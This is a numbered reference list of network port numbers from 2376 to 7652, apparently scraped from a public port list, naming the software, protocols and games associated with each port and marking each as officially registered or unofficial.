496 | 2376 : Docker REST API (SSL) Official
497 | 2379 : KGS Go Server Unofficial
498 | 2381 : HP Insight Manager default for Web server[citation needed] Unofficial
499 | 2399 : FileMaker Data Access Layer (ODBC/JDBC) Official
500 | 2401 : CVS version control system password-based server Official
501 | 2404 : IEC 60870-5 -104, used to send electric power telecontrol messages between two systems via directly connected data circuits Official
502 | 2420 : Westell Remote Access Official
503 | 2424 : OrientDB database listening for Binary client connections Official
504 | 2427 : Cisco MGCP Official
505 | 2447 : ovwdb—OpenView Network Node Manager (NNM) daemon Official
506 | 2463 : LSI RAID Management formerly Symbios Logic Official
507 | 2480 : OrientDB database listening for HTTP client connections Official
508 | 2483 : Oracle database listening for unsecure client connections to the listener, replaces port 1521 Official
509 | 2484 : Oracle database listening for SSL client connections to the listener Official
510 | 2500 : THEÒSMESSENGER listening for TheòsMessenger client connections Official
511 | 2501 : TheosNet-Admin listening for TheòsMessenger client connections Official
512 | 2518 : Willy Official
513 | 2525 : SMTP alternate[citation needed] Unofficial
514 | 2535 : MADCAP—Multicast Address Dynamic Client Allocation Protocol Official
515 | 2540 : LNS/OpenLns Remote Server Official
516 | 2541 : LNS/OpenLns Remote Server Official
517 | 2541 : LonTalk/IP Official
518 | 2546 : LonTalk/IP Official
519 | 2546 : LonTalk/IP Official
520 | 2548 : EVault data protection services (Vytal Vault) Official
521 | 2593 : RunUO—Ultima Online server Unofficial
522 | 2598 : new ICA (Citrix) —when Session Reliability is enabled, : port 2598 replaces port 1494[47] Unofficial
523 | 2599 : SonicWALL anti-spam traffic between Remote Analyzer (RA) and Control Center (CC) Unofficial
524 | 2610 : TrackiT mobile device monitoring Unofficial
525 | 2612 : QPasa from MQSoftware Official
526 | 2636 : Solve Service Official
527 | 2638 : SQL Anywhere database server[54][55] Official
528 | 2641 : HDL Server from CNRI Official
529 | 2642 : Tragic Official
530 | 2643 : NetApp SANTricity Storage Manager Jview process Official
531 | 2698 : Citel / MCK IVPIP Official
532 | 2703 : Vipul's Razor distributed, collaborative, spam-detection-and-filtering network Unofficial
533 | 2710 : XBT Tracker experimental : tracker extension Unofficial
534 | 2710 : XBT Tracker Unofficial
535 | 2710 : Knuddels.de[citation needed] Unofficial
536 | 2735 : NetIQ Monitor Console Official
537 | 2809 : corbaloc:iiop URL, per the CORBA 3.0.3 specification Official
538 | 2809 : IBM WebSphere Application Server (WAS) rmi default (based on CORBA) Unofficial
539 | 2811 : gsi ftp, per the GridFTP specification Official
540 | 2827 : I2P Basic Open Bridge API Unofficial
541 | 2226 : ESET Remote administrator [52] Unofficial
542 | 2868 : Norman Proprietary Event Protocol NPEP Official
543 | 2944 : Megaco text H.248 Unofficial
544 | 2945 : Megaco binary (ASN.1) H.248 Unofficial
545 | 2947 : gpsd GPS daemon Official
546 | 2948 : WAP-push Multimedia Messaging Service (MMS) Official
547 | 2949 : WAP-pushsecure Multimedia Messaging Service (MMS) Official
548 | 2967 : Symantec AntiVirus Corporate Edition Unofficial
549 | 3000 : Miralix License server[citation needed] Unofficial
550 | 3000 : Cloud9 Integrated Development Environment server Unofficial
551 | 3000 : Ruby on Rails development default[56] Unofficial
552 | 3000 : Meteor development default[57] Unofficial
553 | 3000 : BitTorrent Sync Unofficial
554 | 3000 : Distributed Interactive Simulation (DIS), modifiable default Unofficial
555 | 3001 : Miralix Phone Monitor[citation needed] Unofficial
556 | 3001 : Opsware server (Satellite) Unofficial
557 | 3002 : Miralix CSTA[citation needed] Unofficial
558 | 3003 : Miralix GreenBox API[citation needed] Unofficial
559 | 3004 : Miralix InfoLink[citation needed] Unofficial
560 | 3005 : Miralix TimeOut[citation needed] Unofficial
561 | 3006 : Miralix SMS Client Connector[citation needed] Unofficial
562 | 3007 : Miralix OM Server[citation needed] Unofficial
563 | 3008 : Miralix Proxy[citation needed] Unofficial
564 | 3017 : Miralix IVR and Voicemail[citation needed] Unofficial
565 | 3020 : CIFS / SMB Official
566 | 3025 : netpd.org[citation needed] Unofficial
567 | 3030 : NetPanzer Unofficial
568 | 3040 : GoLabs Update Port / Project Open Cannibal Update Port Official
569 | 3050 : gds_db (Interbase/Firebird) Official
570 | 3051 : Galaxy Server (Gateway Ticketing Systems) Official
571 | 3052 : APC PowerChute Network[1] Official
572 | 3071 : Call of duty Black ops port Official
573 | 3074 : Xbox LIVE and/or Games for Windows – Live Official
574 | 3100 : SMAUSA OpCon Scheduler as the default listen port[citation needed] Official
575 | 3101 : BlackBerry Enterprise Server communication to cloud Unofficial
576 | 3119 : D2000 Entis/Actis Application server Official
577 | 3128 : Web caches and the default for the Squid (software) Unofficial
578 | 3128 : Tatsoft default client connection[citation needed] Unofficial
579 | 3141 : devpi Python package server[58] Unofficial
580 | 3162 : SFLM (Standard Floating License Manager) Official
581 | 3180 : Human Inference Suite6 HTML Unofficial
582 | 3181 : Human Inference Suite6 HTTPS Unofficial
583 | 3182 : Human Inference Suite6 AJP Unofficial
584 | 3225 : FCIP (Fiber Channel over Internet Protocol) Official
585 | 3233 : WhiskerControl research control protocol Official
586 | 3235 : Galaxy Network Service (Gateway Ticketing Systems) Official
587 | 3260 : iSCSI target Official
588 | 3268 : msft-gc, Microsoft Global Catalog (LDAP service which contains data from Active Directory forests) Official
589 | 3269 : msft-gc-ssl, Microsoft Global Catalog over SSL (similar to port 3268, LDAP over SSL) Official
590 | 3283 : Apple Remote Desktop reporting (officially Net Assistant, referring to an earlier product) Official
591 | 3290 : Used by VATSIM, the Virtual Air Traffic Simulation network for voice communication. Unofficial
592 | 3299 : SAP-Router (routing application proxy for SAP R/3) Unofficial
593 | 3300 : Debate Gopher backend database system[citation needed] Unofficial
594 | 3305 : odette-ftp, Odette File Transfer Protocol (OFTP) Official
595 | 3306 : MySQL database system Official
596 | 3313 : Verisys file integrity monitoring software Unofficial
597 | 3316 : AzimuthVMS database port for the CCTV recording software AzimuthVMS Unofficial
598 | 3323 : DECE GEODI Server Unofficial
599 | 3333 : Eggdrop, an IRC bot default port[59] Unofficial
600 | 3333 : Network Caller ID server Unofficial
601 | 3333 : CruiseControl.rb[60] Unofficial
602 | 3386 : GTP' 3GPP GSM/UMTS CDR logging protocol Official
603 | 3389 : Microsoft Terminal Server (RDP) officially registered as Windows Based Terminal (WBT)[61] Official
604 | 3396 : Novell NDPS Printer Agent Official
605 | 3412 : xmlBlaster Official
606 | 3455 : [RSVP] Reservation Protocol Official
607 | 3423 : Xware xTrm Communication Protocol Official
608 | 3424 : Xware xTrm Communication Protocol over SSL Official
609 | 3478 : STUN, a protocol for NAT traversal[62] Official
610 | 3478 : TURN, a protocol for NAT traversal[63] (extension to STUN) Official
611 | 3483 : Slim Devices discovery protocol Official
612 | 3483 : Slim Devices SlimProto protocol Official
613 | 3493 : Network UPS Tools (NUT) Official
614 | 3516 : Smartcard Port Official
615 | 3527 : Microsoft Message Queuing Official
616 | 3535 : SMTP alternate[64] Unofficial
617 | 3544 : Teredo tunneling Official
618 | 3562 : SDBProxy Simple DataBase middle-ware and proxy Official
619 | 3605 : ComCam IO Port Official
620 | 3606 : Splitlock Server Official
621 | 3632 : distributed compiler Official
622 | 3645 : Cyc Official
623 | 3659 : Known to be used by [Battlefield 4] Unofficial
624 | 3667 : Information Exchange Official
625 | 3689 : Digital Audio Access Protocol (DAAP)—used by Apple's iTunes and AirPort Express Official
626 | 3690 : Subversion (SVN) version control system Official
627 | 3702 : Web Services Dynamic Discovery (WS-Discovery), used by various components of Windows Vista and later Official
628 | 3724 : Used by some Blizzard games[45] Official
629 | 3724 : Club Penguin Disney online game for kids Unofficial
630 | 3725 : Netia NA-ER Port Official
631 | 3768 : RBLcheckd server daemon Official
632 | 3784 : Bidirectional Forwarding Detection (BFD)for IPv4 and IPv6 (Single Hop) (rfc 5881) Official
633 | 3785 : VoIP program used by Ventrilo Unofficial
634 | 3799 : RADIUS change of authorization Official
635 | 3800 : Used by HGG programs[citation needed] Unofficial
636 | 3804 : Used by Harman Professional HiQnet protocol Official
637 | 3825 : Used by RedSeal Networks client/server connection[citation needed] Unofficial
638 | 3826 : WarMUX game server Official
639 | 3826 : Used by RedSeal Networks client/server connection[citation needed] Unofficial
640 | 3835 : Used by RedSeal Networks client/server connection[citation needed] Unofficial
641 | 3841 : ShipRush client/server communication Official
642 | 3830 : System Management Agent, developed and used by Cerner to monitor and manage solutions Official
643 | 3856 : ERP Server Application used by F10 Software Unofficial
644 | 3880 : IGRS Official
645 | 3868 : SCTP Diameter base protocol (RFC 3588) Official
646 | 3872 : Oracle Enterprise Manager Remote Agent Official
647 | 3899 : Remote Administrator Unofficial
648 | 3900 : udt_os, IBM UniData UDT OS[65] Official
649 | 3945 : EMCADS service, a Giritech product used by G/On Official
650 | 3960 : Warframe Online Unofficial
651 | 3962 : Warframe Online Unofficial
652 | 3978 : OpenTTD game (masterserver and content service) Unofficial
653 | 3979 : OpenTTD game Unofficial
654 | 3999 : Norman distributed scanning service Official
655 | 4000 : Diablo II game Unofficial
656 | 4001 : Microsoft Ants game Unofficial
657 | 4007 : PrintBuzzer printer monitoring socket server[citation needed] Unofficial
658 | 4018 : protocol information and warnings Official
659 | 4035 : IBM Rational Developer for System z Remote System Explorer Daemon Unofficial
660 | 4045 : Solaris lockd NFS lock daemon/manager Unofficial
661 | 4050 : Mud Master Chat protocol (MMCP) - Peer-to-peer communications between MUD clients.[66] Unofficial
662 | 4069 : Minger Email Address Verification Protocol[67] Official
663 | 4089 : OpenCORE Remote Control Service Official
664 | 4090 : Kerio Official
665 | 4093 : PxPlus Client server interface ProvideX Official
666 | 4096 : Ascom Timeplex BRE (Bridge Relay Element) Official
667 | 4100 : WatchGuard authentication applet default Unofficial
668 | 4105 : Shofar (ShofarNexus) Official
669 | 4111 : Xgrid Official
670 | 4116 : Smartcard-TLS Official
671 | 4117 : WatchGuard System Manager Unofficial
672 | 4125 : Microsoft Remote Web Workplace administration Unofficial
673 | 4172 : Teradici PCoIP Official
674 | 4190 : ManageSieve[68] Official
675 | 4201 : TinyMUD and various derivatives Unofficial
676 | 4226 : Aleph One (game) Unofficial
677 | 4224 : Cisco Audio Session Tunneling[citation needed] Unofficial
678 | 4242 : Reverse Battle Tetris Unofficial
679 | 4242 : Orthanc—default DICOM port Unofficial
680 | 4242 : Quassel distributed IRC client Unofficial
681 | 4243 : Commonly used by Docker implementations, redistributions, and setups[69][70][71] Unofficial
682 | 4243 : CrashPlan Unofficial
683 | 4303 : Simple Railroad Command Protocol (SRCP) Official
684 | 4321 : Referral Whois (RWhois) Protocol[72] Official
685 | 4323 : Lincoln Electric's ArcLink/XT[citation needed] Unofficial
686 | 4443 : Individual Zone Solutions P/L Remote Mail Checking Protocol Official
687 | 4444 : Oracle WebCenter Content: Content Server—Intradoc Socket port. (formerly known as Oracle Universal Content Management). Port though often changed during installation Metasploit: Default listener port Unofficial
688 | 4444 : I2P HTTP/S proxy Unofficial
689 | 4445 : I2P HTTP/S proxy Unofficial
690 | 4486 : Integrated Client Message Service (ICMS) Official
691 | 4500 : IPSec NAT Traversal (RFC 3947) Official
692 | 4502 : Microsoft Silverlight connectable ports under non-elevated trust Official
693 | 4505 : Salt master Unofficial
694 | 4506 : Salt master Unofficial
695 | 4534 : Armagetron Advanced default server port Unofficial
696 | 4554 : Default Wesk[73] Self-Hosting Port Unofficial
697 | 4560 : default Log4j socketappender port Unofficial
698 | 4567 : Sinatra default server port in development mode (HTTP) Unofficial
699 | 4569 : Inter-Asterisk eXchange (IAX2) Official
700 | 4604 : Identity Registration Protocol Official
701 | 4605 : Direct End to End Secure Chat Protocol Official
702 | 4610 : QualiSystems TestShell Suite Services Unofficial
703 | 4662 : OrbitNet Message Service Official
704 | 4662 : OrbitNet Message Service Official
705 | 4662 : Default for older versions of eMule[74] Unofficial
706 | 4664 : Google Desktop Search Unofficial
707 | 4672 : Default for older versions of eMule[74] Unofficial
708 | 4711 : eMule optional web interface[74] Unofficial
709 | 4711 : McAfee Web Gateway 7—Default GUI Port HTTP[citation needed] Unofficial
710 | 4712 : McAfee Web Gateway 7—Default GUI Port HTTPS[citation needed] Unofficial
711 | 4713 : PulseAudio sound server Unofficial
712 | 4728 : Computer Associates Desktop and Server Management (DMP)/Port Multiplexer[75] Official
713 | 4730 : Gearman' job server Official
714 | 4732 : Digital Airways' OHM server's commands to mobile devices (used mainly for binary SMS) Official
715 | 4747 : Apprentice Unofficial
716 | 4750 : BladeLogic Agent Unofficial
717 | 4753 : SIMON (service and discovery) Official
718 | 4840 : OPC UA : Protocol for OPC Unified Architecture from OPC Foundation Official
719 | 4843 : OPC UA : Protocol over TLS/SSL for OPC Unified Architecture from OPC Foundation Official
720 | 4847 : Web Fresh Communication, Quadrion Software & Odorless Entertainment Official
721 | 4894 : LysKOM Protocol A Official
722 | 4899 : Radmin remote administration tool Official
723 | 4949 : Munin Resource Monitoring Tool Official
724 | 4950 : Cylon Controls UC32 Communications Port Official
725 | 4982 : Solar Data Log (JK client app for PV solar inverters)[citation needed] Unofficial
726 | 4993 : Home FTP Server web Interface Default Port[citation needed] Unofficial
727 | 5000 : commplex-main Official
728 | 5000 : UPnP—Windows network device interoperability Unofficial
729 | 5000 : VTun—VPN Software Unofficial
730 | 5000 : FlightGear multiplayer[76] Unofficial
731 | 5000 : Synology Inc. Management Console, File Station, Audio Station Unofficial
732 | 5000 : Flask Development Webserver Unofficial
733 | 5000 : Heroku console access Official
734 | 5001 : commplex-link Official
735 | 5001 : Slingbox and Slingplayer Unofficial
736 | 5001 : Iperf (Tool for measuring : and : bandwidth performance) Unofficial
737 | 5001 : Iperf (Tool for measuring : and : bandwidth performance) Unofficial
738 | 5001 : Synology Inc. Secured Management Console, File Station, Audio Station Unofficial
739 | 5002 : ASSA ARX access control system[77] Unofficial
740 | 5002 : Drobo Dashboard[78] Unofficial
741 | 5003 : FileMaker Official
742 | 5004 : RTP (Real-time Transport Protocol) media data (RFC 3551, RFC 4571) Official
743 | 5004 : RTP (Real-time Transport Protocol) media data (RFC 3551, RFC 4571) Official
744 | 5005 : R : (Real-time Transport Protocol) control protocol (RFC 3551, RFC 4571) Official
745 | 5005 : R : (Real-time Transport Protocol) control protocol (RFC 3551, RFC 4571) Official
746 | 5010 : Registered to: TelePath (the IBM FlowMark workflow-management system messaging platform)[79]
747 | 5011 : TelePath (the IBM FlowMark workflow-management system messaging platform)[79] Official
748 | 5029 : Sonic Robo Blast 2 : Multiplayer[80] Unofficial
749 | 5031 : AVM CAPI-over- : (ISDN over Ethernet tunneling)[citation needed] Unofficial
750 | 5037 : Android ADB server Unofficial
751 | 5048 : Texai Message Service Official
752 | 5050 : Yahoo! Messenger Unofficial
753 | 5051 : ita-agent Symantec Intruder Alert[81] Official
754 | 5060 : Session Initiation Protocol (SIP) Official
755 | 5061 : Session Initiation Protocol (SIP) over TLS Official
756 | 5062 : Localisation access Official
757 | 5064 : EPICS Channel Access Server[82] Official
758 | 5065 : EPICS Channel Access Repeater Beacon[83] Official
759 | 5070 : Binary Floor Control Protocol (BFCP)[84] Unofficial
760 | 5082 : Qpur Communication Protocol Official
761 | 5083 : Qpur File Protocol Official
762 | 5084 : EPCglobal Low Level Reader Protocol (LLRP) Official
763 | 5085 : EPCglobal Low Level Reader Protocol (LLRP) over TLS Official
764 | 5093 : SafeNet, Inc Sentinel LM, Sentinel RMS, License Manager, Client-to-Server Official
765 | 5099 : SafeNet, Inc Sentinel LM, Sentinel RMS, License Manager, Server-to-Server Official
766 | 5104 : IBM Tivoli Framework NetCOOL/Impact[85] HTTP Service Unofficial
767 | 5106 : A-Talk Common connection[citation needed] Unofficial
768 | 5107 : A-Talk Remote server connection[citation needed] Unofficial
769 | 5108 : VPOP3 Mail Server Webmail[citation needed] Unofficial
770 | 5109 : VPOP3 Mail Server Status[citation needed] Unofficial
771 | 5110 : ProRat Server Unofficial
772 | 5121 : Neverwinter Nights Unofficial
773 | 5124 : TorgaNET (Micronational Darknet) Unofficial
774 | 5125 : TorgaNET (Micronational Intelligence Darknet) Unofficial
775 | 5150 : ATMP Ascend Tunnel Management Protocol[86] Official
776 | 5150 : Malware Cerberus RAT[citation needed] Unofficial
777 | 5151 : ESRI SDE Instance Official
778 | 5151 : ESRI SDE Remote Start Official
779 | 5154 : BZFlag Official
780 | 5176 : ConsoleWorks default UI interface[citation needed] Unofficial
781 | 5190 : ICQ and AOL Instant Messenger Official
782 | 5222 : Extensible Messaging and Presence Protocol (XMPP) client connection[87][88] Official
783 | 5223 : Extensible Messaging and Presence Protocol (XMPP) client connection over SSL Unofficial
784 | 5228 : HP Virtual Room Service Official
785 | 5228 : Google Play, Android Cloud to Device Messaging Service, Google Cloud Messaging Unofficial
786 | 5246 : Control And Provisioning of Wireless Access Points (CAPWAP) CAPWAP control[89] Official
787 | 5247 : Control And Provisioning of Wireless Access Points (CAPWAP) CAPWAP data[89] Official
788 | 5269 : Extensible Messaging and Presence Protocol (XMPP) server connection[87][88] Official
789 | 5280 : Extensible Messaging and Presence Protocol (XMPP) XEP-0124: Bidirectional-streams Over Synchronous HTTP (BOSH) Official
790 | 5281 : Undo License Manager Official
791 | 5281 : Extensible Messaging and Presence Protocol (XMPP)[90] Unofficial
792 | 5298 : Extensible Messaging and Presence Protocol (XMPP)[91] Official
793 | 5310 : Outlaws (1997 video game). Both : and : are reserved, but only : is used Official
794 | 5349 : STUN, a protocol for NAT traversal ( : is reserved)[62] Official
795 | 5349 : TURN, a protocol for NAT traversal ( : is reserved)[63] Official
796 | 5351 : NAT Port Mapping Protocol—client-requested configuration for inbound connections through network address translators Official
797 | 5353 : Multicast DNS (mDNS) Official
798 | 5355 : LLMNR—Link-Local Multicast Name Resolution, allows hosts to perform name resolution for hosts on the same local link (only provided by Windows Vista and Server 2008) Official
799 | 5357 : Web Services for Devices (WSDAPI) (only provided by Windows Vista, Windows 7 and Server 2008) Unofficial
800 | 5358 : WSDAPI Applications to Use a Secure Channel (only provided by Windows Vista, Windows 7 and Server 2008) Unofficial
801 | 5394 : Kega Fusion, a Sega multi-console emulator[92][93] Unofficial
802 | 5402 : mftp, Stratacache[94] OmniCast[dead link] content delivery system MFTP file sharing protocol Official
803 | 5405 : NetSupport Manager Official
804 | 5412 : IBM Rational Synergy (Telelogic Synergy) (Continuus CM) Message Router Official
805 | 5413 : Wonderware SuiteLink service Official
806 | 5417 : SNS Agent Official
807 | 5421 : NetSupport Manager Official
808 | 5432 : PostgreSQL database system Official
809 | 5433 : Bouwsoft file/webserver[95] Unofficial
810 | 5445 : Cisco Unified Video Advantage[citation needed] Unofficial
811 | 5450 : OSIsoft PI Server Client Access Unofficial
812 | 5454 : OSIsoft PI Asset Framework 1.x Client Access Unofficial
813 | 5455 : OSIsoft PI Asset Framework 1.x Client Access Unofficial
814 | 5457 : OSIsoft PI Asset Framework 2.x Client Access Unofficial
815 | 5458 : OSIsoft PI Notifications Client Access Unofficial
816 | 5459 : OSIsoft PI Asset Framework 2.x Client Access Unofficial
817 | 5463 : OSIsoft PI Asset Based Analytics Unofficial
818 | 5480 : VMware VAMI (Virtual Appliance Management Infrastructure)—used for initial setup of various administration settings on Virtual Appliances designed using the VAMI architecture. Unofficial
819 | 5495 : IBM Cognos TM1 Admin server Unofficial
820 | 5498 : Hotline tracker server connection Unofficial
821 | 5499 : Hotline tracker server discovery Unofficial
822 | 5500 : VNC remote desktop protocol—for incoming listening viewer, Hotline control connection Unofficial
823 | 5501 : Hotline file transfer connection Unofficial
824 | 5517 : Setiqueue Proxy server client for SETI@Home project Unofficial
825 | 5550 : Hewlett-Packard Data Protector[citation needed] Unofficial
826 | 5555 : Oracle WebCenter Content: Inbound Refinery—Intradoc Socket port. (formerly known as Oracle Universal Content Management). Port though often changed during installation Unofficial
827 | 5555 : Freeciv versions up to 2.0, Hewlett-Packard Data Protector, McAfee EndPoint Encryption Database Server, SAP, Default for Microsoft Dynamics CRM 4.0 Unofficial
828 | 5556 : Freeciv, Oracle WebLogic Server Node Manager[96] Official
829 | 5591 : Default for Tidal Enterprise Scheduler master-Socket used for communication between Agent-to-Master, though can be changed[citation needed] Unofficial
830 | 5631 : pcANYWHEREdata, Symantec pcAnywhere (version 7.52 and later[97])[98] data Official
831 | 5632 : pcANYWHEREstat, Symantec pcAnywhere (version 7.52 and later) status Official
832 | 6541 : MirrorOp2 (default) Unofficial
833 | 6542 : MirrorOp2 (fallback) Unofficial
834 | 5656 : IBM Lotus Sametime p2p file transfer Unofficial
835 | 5666 : NRPE (Nagios) Unofficial
836 | 5667 : NSCA (Nagios) Unofficial
837 | 5672 : AMQP[99] Official
838 | 5678 : Mikrotik RouterOS Neighbor Discovery Protocol (MNDP) Unofficial
839 | 5683 : Constrained Application Protocol (CoAP) Official
840 | 5718 : Microsoft DPM Data Channel (with the agent coordinator) Unofficial
841 | 5719 : Microsoft DPM Data Channel (with the protection agent) Unofficial
842 | 5721 : Kaseya[citation needed] Unofficial
843 | 5723 : System Center Operations Manager[100] Unofficial
844 | 5724 : Operations Manager Console Unofficial
845 | 5741 : IDA Discover Port 1 Official
846 | 5742 : IDA Discover Port 2 Official
847 | 5800 : VNC remote desktop protocol—for use over HTTP Unofficial
848 | 5814 : Hewlett-Packard Support Automation (HP OpenView Self-Healing Services)[citation needed] Official
849 | 5850 : COMIT SE (PCR)[citation needed] Unofficial
850 | 5852 : Adeona client: communications to OpenDHT[citation needed] Unofficial
851 | 5900 : Remote Frame Buffer protocol (RFB), Virtual Network Computing (VNC) remote desktop protocol[101] Official
852 | 5912 : Default for Tidal Enterprise Scheduler agent-Socket used for communication between Master-to-Agent, though can be changed[citation needed] Unofficial
853 | 5931 : AMMYY admin Remote Control Official
854 | 5938 : TeamViewer remote desktop protocol[102] Unofficial
855 | 5984 : CouchDB database server Official
856 | 5985 : Windows PowerShell Default psSession Port[103] official
857 | 5986 : Windows PowerShell Default psSession Port[103] official
858 | 5988 : CIM XML transactions over HTTP/S—VMware vCenter ESXi management[104] Unofficial
859 | 5989 : CIM XML transactions over HTTP/S—VMware vCenter ESXi management[104] Unofficial
860 | 5999 : CVSup file update tool[105] Official
861 | 6000 : X11—used between an X client and server over the network Official
862 | 6001 : X11—used between an X client and server over the network Official
863 | 6005 : Default for BMC Software Control-M/Server—Socket used for communication between Control-M processes—though often changed during installation Official
864 | 6005 : Default for Camfrog chat & cam client Unofficial
865 | 6009 : JD Edwards EnterpriseOne ERP system JDENet messaging client listener Unofficial
866 | 6050 : Arcserve backup Unofficial
867 | 6050 : Nortel software[citation needed] Unofficial
868 | 6051 : Arcserve backup Unofficial
869 | 6072 : iOperator Protocol Signal Port[citation needed] Unofficial
870 | 6086 : PDTP—FTP like file server in a P2P network Official
871 | 6100 : Vizrt System Unofficial
872 | 6100 : Ventrilo This is the authentication port that must be allowed outbound for version 3 of Ventrilo Official
873 | 6101 : Backup Exec Agent Browser[citation needed] Unofficial
874 | 6110 : softcm, HP Softbench CM Official
875 | 6111 : spc, HP Softbench Sub-Process Control Official
876 | 6112 : "dtspcd"—a network daemon that accepts requests from clients to execute commands and launch applications remotely Official
877 | 6112 : "dtspcd"—a network daemon that accepts requests from clients to execute commands and launch applications remotely Official
878 | 6112 : Blizzard's Battle.net gaming service and some games,[45] ArenaNet gaming service, Relic gaming service Unofficial
879 | 6112 : Club Penguin Disney online game for kids Unofficial
880 | 6113 : Club Penguin Disney online game for kids, Used by some Blizzard games[45] Unofficial
881 | 6129 : DameWare Remote Control Official
882 | 6159 : ARINC 840 EFB Application Control Interface Official
883 | 6200 : Oracle WebCenter Content Portable: Content Server (With Native UI) and Inbound Refinery Unofficial
884 | 6201 : Oracle WebCenter Content Portable: Admin Unofficial
885 | 6225 : Oracle WebCenter Content Portable: Content Server Web UI Unofficial
886 | 6227 : Oracle WebCenter Content Portable: JavaDB Unofficial
887 | 6230 : Codenger Dev Server Unofficial
888 | 6240 : Oracle WebCenter Content Portable: Capture Unofficial
889 | 6244 : Oracle WebCenter Content Portable: Content Server—Intradoc Socket port Unofficial
890 | 6255 : Oracle WebCenter Content Portable: Inbound Refinery—Intradoc Socket port Unofficial
891 | 6257 : WinMX (see also 6699) Unofficial
892 | 6260 : planet M.U.L.E. Unofficial
893 | 6262 : Sybase Advantage Database Server Unofficial
894 | 6324 : Hall Research Device discovery and configuration Official
895 | 6343 : SFlow, sFlow traffic monitoring Official
896 | 6346 : gnutella-svc, gnutella (FrostWire, Limewire, Shareaza, etc.) Official
897 | 6347 : gnutella-rtr, Gnutella alternate Official
898 | 6350 : App Discovery and Access Protocol Official
899 | 6379 : Redis key-value data store Official
900 | 6389 : EMC CLARiiON Unofficial
901 | 6432 : PgBouncer—A connection pooler for PostgreSQL Official
902 | 6436 : Leap Motion Websocket Server TLS Unofficial
903 | 6437 : Leap Motion Websocket Server Unofficial
904 | 6444 : Sun Grid Engine—Qmaster Service Official
905 | 6445 : Sun Grid Engine—Execution Service Official
906 | 6514 : Syslog over TLS[106] Official
907 | 6502 : Netop Remote Control Unofficial
908 | 6515 : Elipse RPC Protocol (REC) Official
909 | 6522 : Gobby (and other libobby-based software) Unofficial
910 | 6523 : Gobby 0.5 (and other libinfinity-based software) Unofficial
911 | 6543 : Pylons project#Pyramid Default Pylons Pyramid web service port Unofficial
912 | 6543 : Paradigm Research & Development[dead link] Jetnet[107] default Unofficial
913 | 6556 : Check MK Agent Unofficial
914 | 6566 : SANE (Scanner Access Now Easy)—SANE network scanner daemon[108] Official
915 | 6560 : Speech-Dispatcher daemon Unofficial
916 | 6571 : Windows Live FolderShare client Unofficial
917 | 6600 : Microsoft Hyper-V Live Official
918 | 6600 : Music Player Daemon (MPD) Unofficial
919 | 6601 : Microsoft Forefront Threat Management Gateway Official
920 | 6602 : Microsoft Windows WSS Communication Official
921 | 6619 : odette-ftps, Odette File Transfer Protocol (OFTP) over TLS/SSL Official
922 | 6622 : Multicast FTP Official
923 | 6646 : McAfee Network Agent[citation needed] Unofficial
924 | 6653 : Openflow 1.3 Official
925 | 6660 : Internet Relay Chat (IRC) Unofficial
926 | 6665 : Internet Relay Chat (IRC) Official
927 | 6679 : Osorno Automation Protocol (OSAUT) Official
928 | 6679 : IRC SSL (Secure Internet Relay Chat)—often used Unofficial
929 | 6690 : Synology Cloud station Unofficial
930 | 6697 : IRC SSL (Secure Internet Relay Chat)—often used Official
931 | 6699 : WinMX (see also 6257) Unofficial
932 | 6702 : Default for Tidal Enterprise Scheduler client-Socket used for communication between Client-to-Master, though can be changed[citation needed] Unofficial
933 | 6715 : AberMUD and derivatives default port Unofficial
934 | 6771 : Polycom server broadcast[citation needed] Unofficial
935 | 6783 : Splashtop Remote server broadcast Unofficial
936 | 6784 : Splashtop Remote server broadcast Unofficial
937 | 6785 : Splashtop Remote server broadcast Unofficial
938 | 6789 : Campbell Scientific Loggernet Software[109] Unofficial
939 | 6789 : Bucky's Instant Messaging Program Unofficial
940 | 6869 : Derandom default server Unofficial
941 | 6881 : BitTorrent part of full range of ports used most often Unofficial
942 | 6888 : MUSE Official
943 | 6888 : BitTorrent part of full range of ports used most often Unofficial
944 | 6889 : BitTorrent part of full range of ports used most often Unofficial
945 | 6891 : BitTorrent part of full range of ports used most often Unofficial
946 | 6900 : BitTorrent part of full range of ports used most often Unofficial
947 | 6891 : Windows Live Messenger (File transfer) Unofficial
948 | 6901 : Windows Live Messenger (Voice) Unofficial
949 | 6901 : BitTorrent part of full range of ports used most often Unofficial
950 | 6902 : BitTorrent part of full range of ports used most often Unofficial
951 | 6969 : acmsoda Official
952 | 6969 : BitTorrent tracker Unofficial
953 | 6970 : BitTorrent part of full range of ports used most often Unofficial
954 | 7000 : Default for Vuze's built in HTTPS Bittorrent Tracker Unofficial
955 | 7000 : Avira Server Management Console Unofficial
956 | 7001 : Avira Server Management Console Unofficial
957 | 7001 : Default for BEA WebLogic Server's HTTP server, though often changed during installation Unofficial
958 | 7002 : Default for BEA WebLogic Server's HTTPS server, though often changed during installation Unofficial
959 | 7005 : Default for BMC Software Control-M/Server and Control-M/Agent for Agent-to-Server, though often changed during installation Unofficial
960 | 7006 : Default for BMC Software Control-M/Server and Control-M/Agent for Server-to-Agent, though often changed during installation Unofficial
961 | 7010 : Default for Cisco AON AMC (AON Management Console)[110] Unofficial
962 | 7022 : Database mirroring endpoints[111] Unofficial
963 | 7023 : Bryan Wilcutt T2-NMCS Protocol for SatCom Modems Official
964 | 7025 : Zimbra LMTP [mailbox]—local mail delivery Unofficial
965 | 7047 : Zimbra conversion server Unofficial
966 | 7080 : Sepialine Argos Communications port Unofficial
967 | 7133 : Enemy Territory: Quake Wars Unofficial
968 | 7144 : Peercast[citation needed] Unofficial
969 | 7145 : Peercast[citation needed] Unofficial
970 | 7171 : Tibia Unofficial
971 | 7262 : CNAP (Calypso Network Access Protocol) Official
972 | 7306 : Zimbra mysql [mailbox][citation needed] Unofficial
973 | 7307 : Zimbra mysql [logger][citation needed] Unofficial
974 | 7312 : Sibelius License Server Unofficial
975 | 7396 : Web control interface for Folding@home v7.3.6 and later[112] Unofficial
976 | 7400 : RTPS (Real Time Publish Subscribe) DDS Discovery Official
977 | 7401 : RTPS (Real Time Publish Subscribe) DDS User-Traffic Official
978 | 7402 : RTPS (Real Time Publish Subscribe) DDS Meta-Traffic Official
979 | 7471 : Stateless Transport Tunneling (STT) Unofficial
980 | 7473 : Rise: The Vieneo Province Official
981 | 7474 : Neo4J Server webadmin[113] Official
982 | 7509 : ACPLT - process automation service Official
983 | 7547 : CPE WAN Management Protocol (CWMP) Technical Report 069 Official
984 | 7575 : Populous: The Beginning server Unofficial
985 | 7624 : Instrument Neutral Distributed Interface Official
986 | 7631 : ERLPhase Official
987 | 7634 : hddtemp—Utility to monitor hard drive temperature Unofficial
988 | 7652 : I2P anonymizing overlay network Unofficial
